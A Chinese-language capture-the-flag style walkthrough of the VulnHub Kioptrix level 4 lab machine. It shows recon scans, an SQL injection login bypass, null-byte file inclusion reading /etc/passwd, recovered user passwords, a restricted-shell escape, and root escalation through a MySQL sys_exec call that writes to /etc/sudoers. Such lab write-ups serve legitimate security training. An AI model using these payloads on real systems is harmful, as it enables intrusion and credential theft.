vulnhub靶机练习之Kioptrix level 4

探测靶机

使用sudo arp-scan -l扫描，发现靶机IP是192.168.80.19。

kali@kali:~$ sudo arp-scan -l
[sudo] password for kali: 
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b2:07:af, IPv4: 192.168.80.14
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.80.1    00:50:56:c0:00:08       VMware, Inc.
192.168.80.2    00:50:56:fc:96:a7       VMware, Inc.
192.168.80.19   00:0c:29:c9:6f:5d       VMware, Inc.
192.168.80.254  00:50:56:f8:e1:4e       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.308 seconds (110.92 hosts/sec). 4 responded

使用nmap扫描

nmap扫描，发现靶机开启了这些端口服务：22（ssh服务）、80（http服务）、139（smb服务）、445（smb服务）。

kali@kali:~$ sudo nmap -A -T5 -sS 192.168.80.19
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-26 08:16 EST
Nmap scan report for 192.168.80.19
Host is up (0.00091s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:C9:6F:5D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 10h29m59s, deviation: 3h32m08s, median: 7h59m58s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2020-02-26T16:17:07-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.91 ms 192.168.80.19

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.76 seconds

登录页面存在sql注入

输入url地址：http://192.168.80.19/，进入网站登录页面。

输入用户名：admin，密码：’or ‘1’=’1。可以看到提示信息，说明存在sql注入。

sql注入的原理：

查询语句：
SELECT * FROM USERS WHERE username=’admin’ AND password=’ENTERED_PASSWORD’;

注入之后，查询语句为：
SELECT * FROM USERS WHERE username=’admin’ AND password=’’or ‘1’=’1’;

存在文件包含漏洞

登录后的页面：http://192.168.80.19/member.php?username=.
这里把username的值改为.，看到页面返回结果如下：

把username的值改为/，页面返回结果如下：

把username的值改为/etc/passwd，页面返回结果如下：

把username的值改为/etc/networks，页面返回结果如下：

把username的值改为/proc/version，页面返回结果如下：

以上实验，可以推断出，输入用户名之后，url路径会自动转到username/username.php这个页面，并且用户名里面的etc会被系统过滤掉。

漏洞利用

于是利用刚刚发现的规律，我们在username这个值的后面加上空字符串%00，取消url路径中的后缀.php，达到执行恶意shell脚本的目的。
把username的值改为/proc/version%00，从页面返回结果获取到靶机的内核版本是

Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009

。

把username的值改为/etetcc/passwd%00，从页面返回结果获取到用户名：loneferret、john、robert。

将username的值依次改为loneferret、john、robert，发现john和robert这两个用户是常用用户。

进入登录页面，用户名填写john、robert，密码填写注入语句：1'or'1'='1或者'or 1=1#。于是获取到john的密码是：MyNameIsJohn
robert的密码是：ADGAdsafdfwt4gadfga==
注意：获取到john的密码之后，要清除浏览器缓存，重新输入sql注入语句，获取robert的密码。或者简单一点，重新开一个隐私窗口进行sql注入，获取robert的密码。

用ssh远程登录靶机的john用户

ssh登录john：ssh john@192.168.80.19。

kali@kali:~$ ssh john@192.168.80.19
The authenticity of host '192.168.80.19 (192.168.80.19)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.80.19' (RSA) to the list of known hosts.
john@192.168.80.19's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$

在shell中输入?，查看该shell可执行的命令。

1 2	john:~$ ? cd clear echo exit help ll lpath ls

在shell中输入echo os.system("/bin/bash")，把靶机的shell放到攻击机的shell中执行。

1 2	john:~$ echo os.system("/bin/bash") john@Kioptrix4:~$

输入命令：ps aux|grep root，查看以root权限运行的进程：

john@Kioptrix4:~$ ps aux|grep root 
root         1  0.0  0.0   2844  1696 ?        Ss   Feb26   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   Feb26   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   Feb26   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   Feb26   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   Feb26   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   Feb26   0:00 [migration/1]
root         7  0.0  0.0      0     0 ?        S<   Feb26   0:00 [ksoftirqd/1]
root         8  0.0  0.0      0     0 ?        S<   Feb26   0:00 [watchdog/1]
root         9  0.0  0.0      0     0 ?        S<   Feb26   0:00 [migration/2]
root        10  0.0  0.0      0     0 ?        S<   Feb26   0:00 [ksoftirqd/2]
root        11  0.0  0.0      0     0 ?        S<   Feb26   0:00 [watchdog/2]
root        12  0.0  0.0      0     0 ?        S<   Feb26   0:00 [migration/3]
root        13  0.0  0.0      0     0 ?        S<   Feb26   0:00 [ksoftirqd/3]
root        14  0.0  0.0      0     0 ?        S<   Feb26   0:00 [watchdog/3]
root        15  0.0  0.0      0     0 ?        S<   Feb26   0:00 [events/0]
root        16  0.0  0.0      0     0 ?        S<   Feb26   0:00 [events/1]
root        17  0.0  0.0      0     0 ?        S<   Feb26   0:00 [events/2]
root        18  0.0  0.0      0     0 ?        R<   Feb26   0:00 [events/3]
root        19  0.0  0.0      0     0 ?        S<   Feb26   0:00 [khelper]
root        56  0.0  0.0      0     0 ?        S<   Feb26   0:00 [kblockd/0]
root        57  0.0  0.0      0     0 ?        S<   Feb26   0:00 [kblockd/1]
root        58  0.0  0.0      0     0 ?        S<   Feb26   0:00 [kblockd/2]
root        59  0.0  0.0      0     0 ?        S<   Feb26   0:00 [kblockd/3]
root        62  0.0  0.0      0     0 ?        S<   Feb26   0:00 [kacpid]
root        63  0.0  0.0      0     0 ?        S<   Feb26   0:00 [kacpi_notify]
root       195  0.0  0.0      0     0 ?        S<   Feb26   0:00 [kseriod]
root       249  0.0  0.0      0     0 ?        S    Feb26   0:00 [pdflush]
root       250  0.0  0.0      0     0 ?        S    Feb26   0:01 [pdflush]
root       251  0.0  0.0      0     0 ?        S<   Feb26   0:00 [kswapd0]
root       293  0.0  0.0      0     0 ?        S<   Feb26   0:00 [aio/0]
root       294  0.0  0.0      0     0 ?        S<   Feb26   0:00 [aio/1]
root       295  0.0  0.0      0     0 ?        S<   Feb26   0:00 [aio/2]
root       296  0.0  0.0      0     0 ?        S<   Feb26   0:00 [aio/3]
root      1552  0.0  0.0      0     0 ?        S<   Feb26   0:00 [ata/0]
root      1555  0.0  0.0      0     0 ?        S<   Feb26   0:00 [ata/1]
root      1557  0.0  0.0      0     0 ?        S<   Feb26   0:00 [ata/2]
root      1561  0.0  0.0      0     0 ?        S<   Feb26   0:00 [ata/3]
root      1563  0.0  0.0      0     0 ?        S<   Feb26   0:00 [ata_aux]
root      1592  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_0]
root      1593  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_1]
root      1653  0.0  0.0      0     0 ?        S<   Feb26   0:00 [ksuspend_usbd]
root      1658  0.0  0.0      0     0 ?        S<   Feb26   0:00 [khubd]
root      2492  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_2]
root      2633  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_3]
root      2634  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_4]
root      2635  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_5]
root      2636  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_6]
root      2637  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_7]
root      2638  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_8]
root      2639  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_9]
root      2640  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_10]
root      2641  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_11]
root      2642  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_12]
root      2643  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_13]
root      2644  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_14]
root      2645  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_15]
root      2646  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_16]
root      2647  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_17]
root      2648  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_18]
root      2649  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_19]
root      2650  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_20]
root      2651  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_21]
root      2652  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_22]
root      2653  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_23]
root      2654  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_24]
root      2655  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_25]
root      2656  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_26]
root      2657  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_27]
root      2658  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_28]
root      2659  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_29]
root      2660  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_30]
root      2661  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_31]
root      2662  0.0  0.0      0     0 ?        S<   Feb26   0:00 [scsi_eh_32]
root      2883  0.0  0.0      0     0 ?        S<   Feb26   0:00 [kjournald]
root      3062  0.0  0.0   2236   724 ?        S<s  Feb26   0:00 /sbin/udevd --daemon
root      3551  0.0  0.0      0     0 ?        S<   Feb26   0:00 [btaddconn]
root      3552  0.0  0.0      0     0 ?        S<   Feb26   0:00 [btdelconn]
root      3562  0.0  0.0      0     0 ?        S<   Feb26   0:00 [kgameportd]
root      3757  0.0  0.0      0     0 ?        S<   Feb26   0:00 [kpsmoused]
root      4968  0.0  0.0   1716   488 tty4     Ss+  Feb26   0:00 /sbin/getty 38400 tty4
root      4969  0.0  0.0   1716   492 tty5     Ss+  Feb26   0:00 /sbin/getty 38400 tty5
root      4973  0.0  0.0   1716   492 tty2     Ss+  Feb26   0:00 /sbin/getty 38400 tty2
root      4976  0.0  0.0   1716   488 tty3     Ss+  Feb26   0:00 /sbin/getty 38400 tty3
root      4977  0.0  0.0   1716   484 tty6     Ss+  Feb26   0:00 /sbin/getty 38400 tty6
root      5036  0.0  0.0   1872   540 ?        S    Feb26   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/kl
root      5057  0.0  0.0   5316   992 ?        Ss   Feb26   0:00 /usr/sbin/sshd
root      5113  0.0  0.0   1772   524 ?        S    Feb26   0:00 /bin/sh /usr/bin/mysqld_safe
root      5155  0.0  0.7 126988 16292 ?        Sl   Feb26   0:09 /usr/sbin/mysqld --basedir=/usr --datadir
root      5156  0.0  0.0   1700   560 ?        S    Feb26   0:00 logger -p daemon.err -t mysqld_safe -i -t
root      5240  0.0  0.0   6528  1352 ?        Ss   Feb26   0:00 /usr/sbin/nmbd -D
root      5242  0.0  0.1  10108  2720 ?        Ss   Feb26   0:00 /usr/sbin/smbd -D
root      5256  0.0  0.0  10108  1028 ?        S    Feb26   0:00 /usr/sbin/smbd -D
root      5257  0.0  0.0   8084  1608 ?        Ss   Feb26   0:00 /usr/sbin/winbindd
root      5280  0.0  0.0   8084  1160 ?        S    Feb26   0:00 /usr/sbin/winbindd
root      5289  0.0  0.0   2104   888 ?        Ss   Feb26   0:00 /usr/sbin/cron
root      5311  0.0  0.3  20464  6756 ?        Ss   Feb26   0:01 /usr/sbin/apache2 -k start
root      5367  0.0  0.0   1716   492 tty1     Ss+  Feb26   0:00 /sbin/getty 38400 tty1
root      5401  0.0  0.0   8084   868 ?        S    Feb26   0:00 /usr/sbin/winbindd
root      5402  0.0  0.0   8092  1264 ?        S    Feb26   0:00 /usr/sbin/winbindd
root      6546  0.0  0.1  11360  3720 ?        Ss   08:38   0:00 sshd: john [priv]
john      6599  0.0  0.0   3004   752 pts/0    R+   08:45   0:00 grep root

进入Mysql数据库

查看靶机/var/www/这个目录下面的内容，发现checklogin.php这个关键文件。

john@Kioptrix4:~$ cd /var/www/
john@Kioptrix4:/var/www$ ls
checklogin.php  database.sql  images  index.php  john  login_success.php  logout.php  member.php  robert
john@Kioptrix4:/var/www$ cat checklogin.php 
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];

// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);

//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);

// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row

if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
        session_register("myusername");
        session_register("mypassword");
        header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}

ob_end_flush();
?>

从checklogin.php这个文件，我们可以发现Mysql的root密码为空值。于是尝试登入Mysql数据库。

john@Kioptrix4:/var/www$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 67
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>

登入Mysql可以看到，靶机使用的Mysql版本号是：5.0.51a-3ubuntu5.4。

提权

在Mysql命令行输入SELECT sys_exec("echo 'john ALL=(ALL) ALL' >> /etc/sudoers");，将john的权限提升为root。于是我们可以在john的shell里面使用sudo bash切换到root权限的shell，输入john的密码就得到root权限了。
注意：我们能够在Mysql里面使用shell命令，是因为靶机有这个模块lib_mysqludf_sys.so。参考资料

1 2	root@Kioptrix4:/# whereis lib_mysqludf_sys.so lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so

用Mysql的SELECT执行shell：

mysql> SELECT sys_exec("echo 'john ALL=(ALL) ALL' >> /etc/sudoers");
+-------------------------------------------------------+
| sys_exec("echo 'john ALL=(ALL) ALL' >> /etc/sudoers") |
+-------------------------------------------------------+
| NULL                                                  | 
+-------------------------------------------------------+
1 row in set (0.04 sec)

mysql> Aborted
john@Kioptrix4:/var/www$ sudo bash
[sudo] password for john: 
root@Kioptrix4:/var/www# whoami
root

/etc/sudoers是什么

root@Kioptrix4:/# cat /etc/sudoers 
# /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the man page for details on how to write a sudoers file.
#

Defaults        env_reset

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root    ALL=(ALL) ALL

# Uncomment to allow members of group sudo to not need a password
# (Note that later entries override this, so you might need to move
# it further down)
# %sudo ALL=NOPASSWD: ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL
john ALL=(ALL) ALL #这就是通过Mysql命令行写入的，将john的权限提升为root

参考博文

https://nandtech.co/2017/07/16/penetration-testing-practice-hacking-kioptrix-l4/